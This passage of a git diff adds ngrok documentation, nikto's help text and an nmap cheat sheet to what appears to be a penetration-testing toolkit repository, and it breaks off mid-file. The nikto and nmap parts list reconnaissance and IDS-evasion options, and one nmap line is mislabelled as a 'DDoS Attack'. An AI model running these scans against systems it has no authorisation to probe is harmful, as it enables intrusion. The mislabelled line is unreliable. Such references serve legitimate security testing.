+ssh -R 80:localhost:80 tunnel.eu.ngrok.com http
+
+ +

Using ngrok with …

+

Wordpress

+

+ To make ngrok work properly with Wordpress installations you usually need to do two things: +

    +
  1. You must ensure that Wordpress issues relative URLs. You can do so by installing the following plugin:
  2. + + +
  3. + You must ensure that Wordpress understands that it is meant to serve itself from your tunneled hostname. You can configure + Wordpress to do that by modifying your `wp-config` to include the following lines: +
    +
    +
    define('WP_SITEURL', 'http://' . $_SERVER['HTTP_HOST']);
    +define('WP_HOME', 'http://' . $_SERVER['HTTP_HOST']);
    +
    +
  4. +
  5. + You must also instruct ngrok to rewrite the host header, like so: +
    ngrok http -host-header=rewrite https://your-site.dev
    +
  6. +
+

+

Virtual hosts (MAMP, WAMP, etc)

+

+ Popular web servers such as MAMP and WAMP rely on a technique popularly referred to as 'Virtual Hosting' which means that they consult the HTTP request's Host + header to determine which of their multiple sites they should serve. To expose a site like this it is possible to ask ngrok to rewrite the Host header + of all tunneled requests to match what your web server expects. You can do this by using the -host-header option (see: Rewriting the Host header) + to pick which virtual host you want to target. For example, to route to your local site myapp.dev, you would run: +

ngrok http -host-header=myapp.dev 80
+

+

Visual Studio / IIS Express

+

+ Use dproterho's visual studio extension which adds ngrok support directly into Visual Studio: + ngrok extension for Visual Studio +

+

VSCode

+

+ Use nash's VSCode extension which adds ngrok support directly into VSCode: + ngrok extension for VSCode +

+

An outbound proxy

+

+ ngrok works correctly through an HTTP or SOCKS5 proxy. ngrok respects the standard unix environment variable http_proxy. You may also set proxy + configuration explicitly in the ngrok configuration file: +

+

+

node.js

+

+ Use bubenshchykov's npm package for interacting with ngrok from node.js: +

+

+

Puppet

+

+ Use gabe's puppet module for installing and configuring ngrok resources and ensure the ngrok client process is running: + ngrok module for Puppet +

+

Troubleshooting

+

CORS with HTTP basic authentication

+

+ Yes, but you cannot use ngrok's -auth option. ngrok's http tunnels allow you to specify basic authentication credentials to protect your tunnels. However, ngrok enforces this policy on *all* requests, including the preflight OPTIONS requests that are required by the CORS spec. In this case, your application must implement its own basic authentication. For more details, see this github issue. +

+

ngrok Agent API

+

The ngrok client exposes an HTTP API that grants programmatic access to:

+
    +
  • Collect status and metrics information
  • +
  • Collect and replay captured requests
  • +
  • Start and stop tunnels dynamically
  • +
+

Base URL and Authentication

+ + + + + + + + + +
Base URLhttp://127.0.0.1:4040/api +
AuthenticationNone +
+

The ngrok agent API is exposed as part of ngrok's local web inspection interface. Because it is served on a local interface, + the API has no authentication. The Base URL will change if you override web_addr in your configuration file. +

+
Access the root API resource of a running ngrok client
+
+
curl http://localhost:4040/api/
+
+

Supported Content Types

+

Request parameters must be encoded to the API using application/json. + Ensure that your client sets the request's Content-Type header appropriately. + All responses returned by the API are application/json. +

+

Versioning and API Stability

+

The ngrok agent API guarantees that breaking changes to the API will never be made unless the caller explicitly opts in to a newer version. + The mechanism by which a caller opts into a new version of the API will be determined in the future when it becomes necessary. + Examples of non-breaking changes to the API that will not be opt-in include the following. +

+
    +
  • The addition of new resources
  • +
  • The addition of new methods to existing resources
  • +
  • The addition of new fields on existing resource representations
  • +
  • Bug fixes which change the API to match documented behavior
  • +
+
+

List Tunnels

+

Returns a list of running tunnels with status and metrics information.

+
Request
+
GET/api/tunnels +
+
Response
+
Parameters
+ + + + + +
tunnels + list of all running tunnels. See the Tunnel detail resource for docs on the parameters of each tunnel object
+
Example Response
+
+
{
+  "tunnels": [
+      {
+          "name": "command_line",
+          "uri": "/api/tunnels/command_line",
+          "public_url": "https://d95211d2.ngrok.io",
+          "proto": "https",
+          "config": {
+              "addr": "localhost:80",
+              "inspect": true,
+          },
+          "metrics": {
+              "conns": {
+                  "count": 0,
+                  "gauge": 0,
+                  "rate1": 0,
+                  "rate5": 0,
+                  "rate15": 0,
+                  "p50": 0,
+                  "p90": 0,
+                  "p95": 0,
+                  "p99": 0
+              },
+              "http": {
+                  "count": 0,
+                  "rate1": 0,
+                  "rate5": 0,
+                  "rate15": 0,
+                  "p50": 0,
+                  "p90": 0,
+                  "p95": 0,
+                  "p99": 0
+              }
+          }
+      },
+      ...
+  ],
+  "uri": "/api/tunnels"
+}
+
+

Start tunnel

+

Dynamically starts a new tunnel on the ngrok client. The request body parameters are the same as those you would + use to define the tunnel in the configuration file. +

+
Request
+
POST/api/tunnels +
+
Parameters
+

Parameter names and behaviors are identical to those defined in the configuration file. Use the tunnel definitions section as a reference for configuration parameters and their behaviors.

+
Example request body
+
+
{
+  "addr": "22",
+  "proto": "tcp",
+  "name": "ssh"
+}
+
+
Response
+

201 status code with a response body describing the started tunnel. + See the Tunnel detail resource for docs on the parameters of the response object +

+
Example Response
+
+
{
+  "name": "",
+  "uri": "/api/tunnels/",
+  "public_url": "tcp://0.tcp.ngrok.io:53476",
+  "proto": "tcp",
+  "config": {
+      "addr": "localhost:22",
+      "inspect": false,
+  },
+  "metrics": {
+      "conns": {
+          "count": 0,
+          "gauge": 0,
+          "rate1": 0,
+          "rate5": 0,
+          "rate15": 0,
+          "p50": 0,
+          "p90": 0,
+          "p95": 0,
+          "p99": 0
+      },
+      "http": {
+          "count": 0,
+          "rate1": 0,
+          "rate5": 0,
+          "rate15": 0,
+          "p50": 0,
+          "p90": 0,
+          "p95": 0,
+          "p99": 0
+      }
+  }
+}
+
+

Tunnel detail

+

Get status and metrics about the named running tunnel

+
Request
+
GET/api/tunnels/:name +
+
Response
+
Example Response
+
+
{
+  "name": "command_line",
+  "uri": "/api/tunnels/command_line",
+  "public_url": "https://ac294125.ngrok.io",
+  "proto": "https",
+  "config": {
+      "addr": "localhost:80",
+      "inspect": true,
+  },
+  "metrics": {
+      "conns": {
+          "count": 0,
+          "gauge": 0,
+          "rate1": 0,
+          "rate5": 0,
+          "rate15": 0,
+          "p50": 0,
+          "p90": 0,
+          "p95": 0,
+          "p99": 0
+      },
+      "http": {
+          "count": 0,
+          "rate1": 0,
+          "rate5": 0,
+          "rate15": 0,
+          "p50": 0,
+          "p90": 0,
+          "p95": 0,
+          "p99": 0
+      }
+  }
+}
+
+

Stop tunnel

+

Stop a running tunnel

+
Request
+
DELETE/api/tunnels/:name +
+
Response
+

204 status code with an empty body

+

List Captured Requests

+

Returns a list of all HTTP requests captured for inspection. This will only return requests + that are still in memory (ngrok evicts captured requests when their memory usage exceeds inspect_db_size) +

+
Request
+
GET/api/requests/http +
+
Query Parameters
+ + + + + + + + + +
limit + maximum number of requests to return
tunnel_name + filter requests only for the given tunnel name
+
Example Request
+
+
curl http://localhost:4040/api/requests/http?limit=50
+ +
+
Response
+ + + + + +
requests + list of captured requests. See the Captured Request Detail resource for docs on the request objects
+
Example Response
+
+
{
+  "uri": "/api/requests/http",
+  "requests": [
+      {
+          "uri": "/api/requests/http/548fb5c700000002",
+          "id": "548fb5c700000002",
+          "tunnel_name": "command_line (http)",
+          "remote_addr": "192.168.100.25",
+          "start": "2014-12-15T20:32:07-08:00",
+          "duration": 3893202,
+          "request": {
+              "method": "GET",
+              "proto": "HTTP/1.1",
+              "headers": {
+                  "Accept": [
+                      "*/*"
+                  ],
+                  "Accept-Encoding": [
+                      "gzip, deflate, sdch"
+                  ],
+                  "Accept-Language": [
+                      "en-US,en;q=0.8"
+                  ],
+                  "Connection": [
+                      "keep-alive"
+                  ],
+                  "User-Agent": [
+                      "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36"
+                  ],
+                  "X-Original-Host": [
+                      "c159663f.ngrok.io"
+                  ]
+              },
+              "uri": "/favicon.ico",
+              "raw": ""
+          },
+          "response": {
+              "status": "502 Bad Gateway",
+              "status_code": 502,
+              "proto": "HTTP/1.1",
+              "headers": {
+                  "Content-Length": [
+                      "1716"
+                  ]
+              },
+              "raw": "",
+          }
+      },
+      ...
+  ]
+}
+
+

Replay Captured Request

+

Replays a request against the local endpoint of a tunnel

+
Request
+
POST/api/requests/http +
+
Parameters
+ + + + + + + + + +
id + id of request to replay
tunnel_name + name of the tunnel to play the request against. If unspecified, the request is played against the same tunnel it was recorded on
+
Example Request
+
+
curl -H "Content-Type: application/json" -d '{"id": "548fb5c700000002"}' http://localhost:4040/api/requests/http
+ +
+
Response
+

204 status code with an empty body

+

Delete Captured Requests

+

Deletes all captured requests

+
Request
+
DELETE/api/requests/http +
+
Response
+

204 status code with no response body

+

Captured Request Detail

+

Returns metadata and raw bytes of a captured request. The raw data is base64-encoded in the JSON response. The response value may be null if the local server has not yet responded to a request.

+
Request
+
GET/api/requests/http/:request_id +
+
Response
+
Example Response
+
+
{
+  "uri": "/api/requests/http/548fb5c700000002",
+  "id": "548fb5c700000002",
+  "tunnel_name": "command_line (http)",
+  "remote_addr": "192.168.100.25",
+  "start": "2014-12-15T20:32:07-08:00",
+  "duration": 3893202,
+  "request": {
+      "method": "GET",
+      "proto": "HTTP/1.1",
+      "headers": {
+          "Accept": [
+              "*/*"
+          ],
+          "Accept-Encoding": [
+              "gzip, deflate, sdch"
+          ],
+          "Accept-Language": [
+              "en-US,en;q=0.8"
+          ],
+          "Connection": [
+              "keep-alive"
+          ],
+          "User-Agent": [
+              "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36"
+          ],
+          "X-Original-Host": [
+              "c159663f.ngrok.io"
+          ]
+      },
+      "uri": "/favicon.ico",
+      "raw": ""
+  },
+  "response": {
+      "status": "502 Bad Gateway",
+      "status_code": 502,
+      "proto": "HTTP/1.1",
+      "headers": {
+          "Content-Length": [
+              "1716"
+          ]
+      },
+      "raw": "",
+  }
+}
+
+
+

ngrok HTTP API

+

We expose an HTTP API that grants programmatic access to + all of ngrok's resources.

+

A basic understanding of ngrok and its features is strongly encouraged before using this API: + the ngrok.com HTTP API. +

+

+ This HTTP API is part of our Beta suite of features and any user subscribed to a paid ngrok plan can request access. Please note, we may be charging for some features in our Beta suite once they are officially released. +

+ +

Errors

+

When something goes wrong, we report an error code: in the agent, our REST API, or + at our edge.

+

You can see a comprehensive list of those errors + in our error index. +

+ +

Guides

+

We have written some guides to walk you through some common workflows.

+ + +

Backward Compatibility

+

ngrok makes promises about the compatibility and stability of its interfaces so that you can confidently build integrations on top and know what changes to expect when upgrading to newer versions.

+

Compatibility promise

+
    +
  • Point Release (2.0.0 -> 2.0.1) - ngrok promises no breaking changes across point releases
  • +
  • Minor Version Change (2.0 -> 2.1) - ngrok may make small changes that break compatibility for functionality that affects a very small minority of users across a minor version change.
  • +
  • Major Version Change (2.0 -> 3.0) - ngrok makes no promise that any interfaces are stable across a major version change.
  • +
+

What interfaces are subject to the promise?

+
    +
  • The ngrok command line interface: the commands and their options
  • +
  • The ngrok configuration file
  • +
  • The ngrok agent API
  • +
+

Any other interface, like the logging format or the web UI, is not subject to any compatibility promise and may change without warning between versions.

+

Changes in 2.3

+

If asked to forward to port 443, ngrok will now automatically forward HTTPS traffic instead of HTTP. This change would + only affect you if you previously ran a server accepting unencrypted HTTP on port 443. To workaround this, you may specify an explicit http + URL if you need the old behavior: ngrok http http://localhost:443. +

+

If run under sudo, the ngrok client previously consulted the sudo-ing user's home directory file when looking for its default configuration file. + It now consults the home directory of the assumed user. To workaround this, you may specify an explicit configuration file location with + the -config option. +

+

Changes in 2.2

+

The ngrok agent API no longer accepts application/x-www-form-urlencoded request bodies. In practice, this only affects the /api/requests/http/:id endpoint because posting to the /api/tunnels endpoint with this type of request body previously caused ngrok to crash.

+

This change was made to help protect against maliciously crafted web pages that could cause a user to inadvertently interact with their local ngrok API.

+

Changes in 2.1

+

Behavior changes for http and tls tunnels defined in the configuration file or started via the API that do not have + a subdomain or hostname property. +

+
+
tunnels:
+  webapp:
+  proto: http
+  addr: 80
+
+

Given this example tunnel configuration, behavior will change in the following ways.

+
Old Behavior
+

Starts a tunnel using the name of the tunnel as the subdomain resulting in the URL http://webapp.ngrok.io

+
New Behavior
+

Starts a tunnel with a random subdomain, for example a URL like http://d95211d2.ngrok.io

+
How to keep the old behavior
+

Add a subdomain property with the same name as the tunnel:

+
+
tunnels:
+  webapp:
+  proto: http
+  addr: 80
+  subdomain: webapp
+
+

This behavior changed in order to make it possible to launch tunnels with random domains. The previous behavior prevented free tier users from using the configuration file and agent API.

+ +

ngrok 1.x sunset

+

The ngrok 1.X service shut down on April 4, 2016. More details can be found on the ngrok 1.x sunset announcement

+ +

FAQ

+

What information is stored about my tunnels?

+

+ ngrok does not log or store any data transmitted through your tunneled connections. ngrok does log some information about the connections which are used for debugging purposes and metrics like the name of the tunnel and the duration of connections. For complete end-to-end security, use a TLS tunnel. +

+

How do I pronounce ngrok?

+

+ en-grok +

+ + + + + + + + + + + + + + + + + + + diff --git a/.deb/home/.local/etc/i-Haklab/Tools/Readme/N/nikto.md b/.deb/home/.local/etc/i-Haklab/Tools/Readme/N/nikto.md new file mode 100755 index 00000000..f2f56b08 --- /dev/null +++ b/.deb/home/.local/etc/i-Haklab/Tools/Readme/N/nikto.md @@ -0,0 +1,100 @@ +nikto +===== + +Nikto web server scanner - https://cirt.net/Nikto2 + +Full documentation - https://cirt.net/nikto2-docs/ + +Basic usage: + +``` + Options: + -ask+ Whether to ask about submitting updates + yes Ask about each (default) + no Don't ask, don't send + auto Don't ask, just send + -Cgidirs+ Scan these CGI dirs: "none", "all", or values like "/cgi/ /cgi-a/" + -config+ Use this config file + -Display+ Turn on/off display outputs: + 1 Show redirects + 2 Show cookies received + 3 Show all 200/OK responses + 4 Show URLs which require authentication + D Debug output + E Display all HTTP errors + P Print progress to STDOUT + S Scrub output of IPs and hostnames + V Verbose output + -dbcheck Check database and other key files for syntax errors + -evasion+ Encoding technique: + 1 Random URI encoding (non-UTF8) + 2 Directory self-reference (/./) + 3 Premature URL ending + 4 Prepend long random string + 5 Fake parameter + 6 TAB as request spacer + 7 Change the case of the URL + 8 Use Windows directory separator (\) + A Use a carriage return (0x0d) as a request spacer + B Use binary value 0x0b as a request spacer + -Format+ Save file (-o) format: + csv Comma-separated-value + htm HTML Format + msf+ Log to Metasploit + nbe Nessus NBE format + txt Plain text + xml XML Format + (if not specified the format will be taken from the file extension passed to -output) + -Help Extended help information + -host+ Target host + -IgnoreCode Ignore Codes--treat as negative responses + -id+ Host authentication to use, format is id:pass or id:pass:realm + -key+ Client certificate key file + -list-plugins List all available plugins, perform no testing + -maxtime+ Maximum testing time per host 
+ -mutate+ Guess additional file names: + 1 Test all files with all root directories + 2 Guess for password file names + 3 Enumerate user names via Apache (/~user type requests) + 4 Enumerate user names via cgiwrap (/cgi-bin/cgiwrap/~user type requests) + 5 Attempt to brute force sub-domain names, assume that the host name is the parent domain + 6 Attempt to guess directory names from the supplied dictionary file + -mutate-options Provide information for mutates + -nointeractive Disables interactive features + -nolookup Disables DNS lookups + -nossl Disables the use of SSL + -no404 Disables nikto attempting to guess a 404 page + -output+ Write output to this file ('.' for auto-name) + -Pause+ Pause between tests (seconds, integer or float) + -Plugins+ List of plugins to run (default: ALL) + -port+ Port to use (default 80) + -RSAcert+ Client certificate file + -root+ Prepend root value to all requests, format is /directory + -Save Save positive responses to this directory ('.' for auto-name) + -ssl Force ssl mode on port + -Tuning+ Scan tuning: + 1 Interesting File / Seen in logs + 2 Misconfiguration / Default File + 3 Information Disclosure + 4 Injection (XSS/Script/HTML) + 5 Remote File Retrieval - Inside Web Root + 6 Denial of Service + 7 Remote File Retrieval - Server Wide + 8 Command Execution / Remote Shell + 9 SQL Injection + 0 File Upload + a Authentication Bypass + b Software Identification + c Remote Source Inclusion + x Reverse Tuning Options (i.e., include all except specified) + -timeout+ Timeout for requests (default 10 seconds) + -Userdbs Load only user databases, not the standard databases + all Disable standard dbs and load only user dbs + tests Disable only db_tests and load udb_tests + -until Run until the specified time or duration + -update Update databases and plugins from CIRT.net + -useproxy Use the proxy defined in nikto.conf + -Version Print plugin and database versions + -vhost+ Virtual host (for Host header) + + requires a value +``` diff 
--git a/.deb/home/.local/etc/i-Haklab/Tools/Readme/N/nmap.md b/.deb/home/.local/etc/i-Haklab/Tools/Readme/N/nmap.md new file mode 100755 index 00000000..ec220989 --- /dev/null +++ b/.deb/home/.local/etc/i-Haklab/Tools/Readme/N/nmap.md @@ -0,0 +1,196 @@ + +:::::::::::::::::::::::::::::::::::::: NMAP QUICK GUIDE :::::::::::::::::::::::::::::::::::::: + +nmap -iL ips.txt | Scan ips in .txt file +nmap -p | Scan an specific port +nmap -p 20-30 | Scan ports between 20 at 30 +nmap -p- | Scan all 65,535 ports +nmap -F | Fast scan +nmap -sT | Scan TCP connect +nmap -sS | Scan sync(puertos abiertos) +nmap -sP | Localiza equipos activos +nmap -sN | Null scan +nmap -sF | Scan FIN +nmap -v | Verbose +nmap -sU | Scan UDP +nmap -sX | scan XMAS +nmap -A | All=show SO/type of service +nmap -sV | Scan only active service +nmap -sV --version-intesity 0-5 | Add intesity level at scan +nmap -P0 -p- -sL | Scan idle +sudo nmap -sP | Show all IPs in the network +nmap -oN | Save results in .txt file +nmap -oX | Sava results in .xml file +nmap -sC | Run an specific script +nmap --script-help=ssl-heartbleed https://m.example.com | Scan some webpage +nmap --script=msrpc-enum | enumerar servicios de Microsoft +nmap --script=all | Scan all scripts +nmap -sU -A -PN -n -pU68 --script=all 192.168.0.0 | DDoS Attack +## NMAP CHEAT SHEET + +- Target Specification +```bash +nmap 192.168.1.1 #Scan a single IP +nmap 192.168.1.1 192.168.2.1 #Scan specific IPs +nmap 192.168.1.1-254 #Scan a range +nmap scanme.nmap.org #Scan a domain +nmap 192.168.1.0/24 #Scan using CIDR notation +nmap -iL targets.txt #Scan targets from a file +nmap -iR 100 #Scan 100 random hosts +nmap –exclude 192.168.1.1 #Exclude listed hosts +``` + +- Nmap Scan Techniques +```bash +nmap 192.168.1.1 -sS #TCP SYN port scan (Default) +nmap 192.168.1.1 -sT #TCP connect port scan (Default without root privilege) +nmap 192.168.1.1 -sU #UDP port scan +nmap 192.168.1.1 -sA #TCP ACK port scan +nmap 192.168.1.1 -sW #TCP Window port scan +nmap 
192.168.1.1 -sM #TCP Maimon port scan +``` + +- Host Discovery +```bash +nmap 192.168.1.1-3 -sL #No Scan. List targets only +nmap 192.168.1.1/24 -sn #Disable port scanning. Host discovery only. +nmap 192.168.1.1-5 -Pn #Disable host discovery. Port scan only. +nmap 192.168.1.1-5 -PS22-25,80 #TCP SYN discovery on port x. Port 80 by default +nmap 192.168.1.1-5 -PA22-25,80 #TCP ACK discovery on port x. Port 80 by default +nmap 192.168.1.1-5 -PU53 #UDP discovery on port x.Port 40125 by default +nmap 192.168.1.1-1/24 -PR #ARP discovery on local network +nmap 192.168.1.1 -n #Never do DNS resolution +``` + +- Port Specification +```bash +nmap 192.168.1.1 -p 21 #Port scan for port x +nmap 192.168.1.1 -p 21-100 #Port range +nmap 192.168.1.1 -p U:53,T:21-25,80 #Port scan multiple TCP and UDP ports +nmap 192.168.1.1 -p- #Port scan all ports +nmap 192.168.1.1 -p http,https #Port scan from service name +nmap 192.168.1.1 -F #Fast port scan (100 ports) +nmap 192.168.1.1 –top-ports 2000 #Port scan the top x ports +nmap 192.168.1.1 -p-65535 #Leaving off initial port in range makes the scan start at port 1 +nmap 192.168.1.1 -p0- #Leaving off end port in range makes the scan go through to port 65535 +``` + +- Service and Version Detection +```bash +nmap 192.168.1.1 -sV #Attempts to determine the version of the service running on port +nmap 192.168.1.1 -sV –version-intensity 8 #Intensity level 0 to 9. Higher number increases possibility of correctness +nmap 192.168.1.1 -sV –version-light #Enable light mode. Lower possibility of correctness. Faster +nmap 192.168.1.1 -sV –version-all #Enable intensity level 9. Higher possibility of correctness. 
Slower +nmap 192.168.1.1 -A #Enables OS detection(-O), version detection(-sV), script scanning(-sC), and traceroute +``` + +- OS Detection +```bash +nmap 192.168.1.1 -O #Remote OS detection using TCP/IP stack fingerprinting +nmap 192.168.1.1 -O –osscan-limit #If at least one open and one closed TCP port are not found it will not try OS detection against host +nmap 192.168.1.1 -O –osscan-guess #Makes Nmap guess more aggressively +nmap 192.168.1.1 -O –max-os-tries 1 #Set the maximum number x of OS detection tries against a target +nmap 192.168.1.1 -A #Enables OS detection, version detection, script scanning, and traceroute +``` + +- Timing and Performance +```bash +nmap 192.168.1.1 -T0 #Paranoid (0) Intrusion Detection System evasion +nmap 192.168.1.1 -T1 #Sneaky (1) Intrusion Detection System evasion +nmap 192.168.1.1 -T2 #Polite (2) slows down the scan to use less bandwidth and use less target machine resources +nmap 192.168.1.1 -T3 #Normal (3) which is default speed +nmap 192.168.1.1 -T4 #Aggressive (4) speeds scans; assumes you are on a reasonably fast and reliable network +nmap 192.168.1.1 -T5 #Insane (5) speeds scan; assumes you are on an extraordinarily fast network +``` + +- Timing and Performance Switches +```bash +–host-timeout